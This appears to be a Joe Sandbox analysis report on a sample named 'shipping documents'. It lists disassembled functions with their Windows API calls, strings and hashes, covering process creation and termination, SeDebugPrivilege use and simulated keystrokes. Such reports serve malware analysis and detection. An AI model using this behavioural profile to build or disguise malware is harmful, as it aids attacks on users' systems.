Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 8349d6074a8157628b25f8697b434a6a05801c4915929d18325385bfde83b306
Instruction ID: 6d5ecf253ce836e1f5e31319ef3fe99fa74c157e881bd4b2a5b49e7a53e1c92b
Opcode Fuzzy Hash: 8349d6074a8157628b25f8697b434a6a05801c4915929d18325385bfde83b306
Instruction Fuzzy Hash: 2A31A0B5604204BBDB159F18DC94BEA37BFEB16712F508075F8018B3A0DB749D82CB94

Function 006C9428 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006C947C
VariantInit.OLEAUT32(?), ref: 006C954D
VariantInit.OLEAUT32(?), ref: 006C964E
VariantClear.OLEAUT32(?), ref: 006C9658
VariantClear.OLEAUT32(?), ref: 006C96B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 006C9631
,,n, xrefs: 006C94FA
Null Object assignment in FOR..IN loop, xrefs: 006C94DD, 006C960B, 006C96C3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,n$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2400968246
Opcode ID: 34b2cf587333b0ba05d14405b9b97d7012601122526bc22318b770045ed15487
Instruction ID: 78160d8121300dda3b412b31ff0e1bcf0b28bea425002b0e47226c2181ec835c
Opcode Fuzzy Hash: 34b2cf587333b0ba05d14405b9b97d7012601122526bc22318b770045ed15487
Instruction Fuzzy Hash: DB916A71A00219ABDF24DFA6C848FAEBBBAEF45710F10855DF519AB280D7709945CFA0

Function 006AA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,006AAA64), ref: 006AA9A2

Strings

REGEXPCLASS, xrefs: 006AA767
CLASS, xrefs: 006AA721
INSTANCE, xrefs: 006AA8B0
NAME, xrefs: 006AA7D4
TEXT, xrefs: 006AA8D9
CLASSNN, xrefs: 006AA744

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: b8860ae03fe31e8e09a2507529407a30ef1fcecf855c606a6f992d721d71634e
Instruction ID: b0b89d87d4f1f8b6689e0dbbb3bc85d70e05f2d5cec9cae6bac5025feb1a4501
Opcode Fuzzy Hash: b8860ae03fe31e8e09a2507529407a30ef1fcecf855c606a6f992d721d71634e
Instruction Fuzzy Hash: 2F918730900606DBDB58EFA0C441BEAF7B6BF05304F10812ED99AA7251DF306D5ADFA5

Function 00652E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00652EAE

Part of subcall function 00651DB3: GetClientRect.USER32(?,?), ref: 00651DDC
Part of subcall function 00651DB3: GetWindowRect.USER32(?,?), ref: 00651E1D
Part of subcall function 00651DB3: ScreenToClient.USER32(?,?), ref: 00651E45

GetDC.USER32 ref: 0068CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0068CF95
SelectObject.GDI32(00000000,00000000), ref: 0068CFA3
SelectObject.GDI32(00000000,00000000), ref: 0068CFB8
ReleaseDC.USER32(?,00000000), ref: 0068CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0068D04B

Strings

U, xrefs: 0068CF20

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 681f39c55697ae31a44c5e3feecafa5c6dbc06776a1a17d1660cd8434cec1ee3
Instruction ID: 413bcdc22436cbd196444c7edeb8550485fe5fddecdbd8931a3c4a43b03de411
Opcode Fuzzy Hash: 681f39c55697ae31a44c5e3feecafa5c6dbc06776a1a17d1660cd8434cec1ee3
Instruction Fuzzy Hash: A871D230400205DFCF21AF64C895AEA7BB7FF49361F14836AEE559A2A6C7318C46DB70

Function 006C8F5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,006DF910), ref: 006C903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,006DF910), ref: 006C9071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006C91EB
SysFreeString.OLEAUT32(?), ref: 006C9215

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: a930013c501ba31815cc32d6d9a1888ed641bd890694b059e71411e2fe732794
Instruction ID: 96789e119b79a6fdae36ad7bb8e05c07890c22ede03812f1e57e9a8922486587
Opcode Fuzzy Hash: a930013c501ba31815cc32d6d9a1888ed641bd890694b059e71411e2fe732794
Instruction Fuzzy Hash: 31F1F771A00109EFDB14DF94C888EBEB7BAFF49315F148059F916AB251DB31AE46CB60

Function 006CF9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006CF9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CFB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006CFB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CFBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 006CFBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006CFD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006CFD90
CloseHandle.KERNEL32(?), ref: 006CFDBF
CloseHandle.KERNEL32(?), ref: 006CFE36

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a4cc1b23c8bafad03dee672b9f5b6abb79c76f92370990dbd1e2a6bdb7dfa150
Instruction ID: a141b48f9e8fb9d07652c983101dd46ea871e1f4caa866dadc1a5d82ca647fed
Opcode Fuzzy Hash: a4cc1b23c8bafad03dee672b9f5b6abb79c76f92370990dbd1e2a6bdb7dfa150
Instruction Fuzzy Hash: 7FE16C31604241DFC754EF24C491BAABBE2EF85314F18856DF89A8B3A2DB31EC45CB56

Function 006B4F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006B38D3,?), ref: 006B48C7

Part of subcall function 006B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006B38D3,?), ref: 006B48E0

Part of subcall function 006B4CD3: GetFileAttributesW.KERNEL32(?,006B3947), ref: 006B4CD4

lstrcmpiW.KERNEL32(?,?), ref: 006B4FE2
_wcscmp.LIBCMT ref: 006B4FFC
MoveFileW.KERNEL32(?,?), ref: 006B5017

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: fdd04bc821592fbc2ec66e5a792b941167f382b6d638d0d21fe0b8c0122f598e
Instruction ID: 7b11fb7874eea4fe908fea61f6e32913fd5b95e6f844baa43640e260bbf2a716
Opcode Fuzzy Hash: fdd04bc821592fbc2ec66e5a792b941167f382b6d638d0d21fe0b8c0122f598e
Instruction Fuzzy Hash: 1C5177F24087855BC764EB64D881ADFB3EDAF84301F00492EF58AD7152EF75A18C876A

Function 006D88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006D896E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 378793d540ec044189b18d380836545973e524aa92d04b3a3ce1de1250e40978
Instruction ID: 06d1c1fd569e6ee2bf45e4d7e6980106e7006a8849852e931f022aa91355a7ab
Opcode Fuzzy Hash: 378793d540ec044189b18d380836545973e524aa92d04b3a3ce1de1250e40978
Instruction Fuzzy Hash: 16518130E00209BFDB209F28CC8DBA97B67BB05310F644117F915EB7A1DF71AA809B91

Function 00652B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0068C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0068C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0068C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0068C5C0
DestroyIcon.USER32(00000000), ref: 0068C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0068C5EC
DestroyIcon.USER32(?), ref: 0068C5FB

Part of subcall function 006DA71E: DeleteObject.GDI32(00000000), ref: 006DA757

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: eeb6437350ed85fb50c3f3ef55e8672527ae8aa986260d55d3ece8a185053244
Instruction ID: fa0726fa2d09a6cfec71cd307b66c574055e35729d0d140fbe645609c45b3f31
Opcode Fuzzy Hash: eeb6437350ed85fb50c3f3ef55e8672527ae8aa986260d55d3ece8a185053244
Instruction Fuzzy Hash: 5A517D74A00206AFDF20DF24DC55FAA37B6EB55321F104629F902972D0DB70ED91DB60

Function 006A9B50 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 006AAE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 006AAE77
Part of subcall function 006AAE57: GetCurrentThreadId.KERNEL32 ref: 006AAE7E
Part of subcall function 006AAE57: AttachThreadInput.USER32(00000000,?,006A9B65,?,00000001), ref: 006AAE85

MapVirtualKeyW.USER32(00000025,00000000), ref: 006A9B70
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006A9B8D
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006A9B90
MapVirtualKeyW.USER32(00000025,00000000), ref: 006A9B99
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006A9BB7
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A9BBA
MapVirtualKeyW.USER32(00000025,00000000), ref: 006A9BC3
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006A9BDA
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006A9BDD

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 7a03657b5993217cb5e6cb1f86bc2a4c84270453ace4bde178e5f6019bb08c08
Instruction ID: 0cef067f6be6aa1d32a486f03f0e2efd9cfc4ee26527b67ac3b58d1858b8decb
Opcode Fuzzy Hash: 7a03657b5993217cb5e6cb1f86bc2a4c84270453ace4bde178e5f6019bb08c08
Instruction Fuzzy Hash: 8311E171A50218FEF7106B60DC89F6A3B2EEB4D751F20142AF245AB0A0CAF25C10DAB4

Function 006A8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,006A8A84,00000B00,?,?), ref: 006A8E0C
HeapAlloc.KERNEL32(00000000,?,006A8A84,00000B00,?,?), ref: 006A8E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,006A8A84,00000B00,?,?), ref: 006A8E28
GetCurrentProcess.KERNEL32(?,00000000,?,006A8A84,00000B00,?,?), ref: 006A8E30
DuplicateHandle.KERNEL32(00000000,?,006A8A84,00000B00,?,?), ref: 006A8E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,006A8A84,00000B00,?,?), ref: 006A8E43
GetCurrentProcess.KERNEL32(006A8A84,00000000,?,006A8A84,00000B00,?,?), ref: 006A8E4B
DuplicateHandle.KERNEL32(00000000,?,006A8A84,00000B00,?,?), ref: 006A8E4E
CreateThread.KERNEL32(00000000,00000000,006A8E74,00000000,00000000,00000000), ref: 006A8E68

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e2742ad0cf6940990e69b4b88131b678f16b6c289efd59685e492f7b0d6721f8
Instruction ID: 1b432c5000369cfb12a1083150e3f89ec2b2c58b1cdc721bd3b13b89d4c48517
Opcode Fuzzy Hash: e2742ad0cf6940990e69b4b88131b678f16b6c289efd59685e492f7b0d6721f8
Instruction Fuzzy Hash: 9401BBB5A41308FFE710ABA5DC4DF6B3BADEB89711F015421FA05DB1A1CA709D00CB60

Function 006C9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 006A7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?,?,006A799D), ref: 006A766F
Part of subcall function 006A7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?), ref: 006A768A
Part of subcall function 006A7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?), ref: 006A7698
Part of subcall function 006A7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?), ref: 006A76A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 006C9B1B
_memset.LIBCMT ref: 006C9B28
_memset.LIBCMT ref: 006C9C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 006C9C97
CoTaskMemFree.OLE32(?), ref: 006C9CA2

Strings

NULL Pointer assignment, xrefs: 006C9CF0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: e9974be6332dad15c94cacf0a6754a9dee1bfc6c8ab60f5383b820dd5d27c2f8
Instruction ID: 6ceb7923ec4dd13f6332c289855ca49b43a10309760bcf63b225b5771b0de6fc
Opcode Fuzzy Hash: e9974be6332dad15c94cacf0a6754a9dee1bfc6c8ab60f5383b820dd5d27c2f8
Instruction Fuzzy Hash: BA911A71D00219EBDB10DFA5DC85EEEBBBAEF08710F20415AF51AA7241DB719A45CFA0

Function 006D6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006D7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 006D70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006D70C1
_wcscat.LIBCMT ref: 006D711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 006D7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 006D7161

Strings

SysListView32, xrefs: 006D7065

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: f778977e5e05966e1aca860452bfc1a1324ac3bfe044be714d35d703e1270cdc
Instruction ID: e68159b2b1f26f11942f302cbd6b748bfb63b17b9da7e256429c1b80935d2c7e
Opcode Fuzzy Hash: f778977e5e05966e1aca860452bfc1a1324ac3bfe044be714d35d703e1270cdc
Instruction Fuzzy Hash: 4E419F70904308ABDB219F64CC85BEA77AAEF08350F10452BF545A73D2E6719D848B64

Function 006CEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 006B3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006B3EB6
Part of subcall function 006B3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006B3EC4
Part of subcall function 006B3E91: CloseHandle.KERNEL32(00000000), ref: 006B3F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CECB8
GetLastError.KERNEL32 ref: 006CECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 006CECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 006CED77
GetLastError.KERNEL32(00000000), ref: 006CED82
CloseHandle.KERNEL32(00000000), ref: 006CEDB7

Strings

SeDebugPrivilege, xrefs: 006CECD6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 8ea16fa52c34336746da7f287fddd66eac748551c2acfa1ba70ce2d992baeaac
Instruction ID: a45089f801ed91f40eb382710091e67fb2a1637bbb15d47abb1c50c4e6f49062
Opcode Fuzzy Hash: 8ea16fa52c34336746da7f287fddd66eac748551c2acfa1ba70ce2d992baeaac
Instruction Fuzzy Hash: 3F4179716002009FDB14EF24CC95FBEB7A6AF40714F08805DF9439B2D2DB76A904CBAA

Function 006B3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 006B32C5

Strings

stop, xrefs: 006B3296
blank, xrefs: 006B3247
info, xrefs: 006B3266
question, xrefs: 006B327E
warning, xrefs: 006B32AE

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 64cd030777ea5d8953a17b204ca8ad29792b196eef00b66b51cbc08657cf822b
Instruction ID: 6e2936cf46cd72ac69c480fe550c23e8cfa734169aa88a680f0ec6bf1d84ea6f
Opcode Fuzzy Hash: 64cd030777ea5d8953a17b204ca8ad29792b196eef00b66b51cbc08657cf822b
Instruction Fuzzy Hash: 7B1105B2748376FAE7015B64DC42DEAB3DEEF19360F20402AF504A63C2E6759B8147A5

Function 006B4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006B454E
LoadStringW.USER32(00000000), ref: 006B4555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006B456B
LoadStringW.USER32(00000000), ref: 006B4572
_wprintf.LIBCMT ref: 006B4598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 006B45B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 006B4593

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 7883ad16b9d8835579ba23a2537a7be3ffbbe9e18a038cf5d2644299ec14fd98
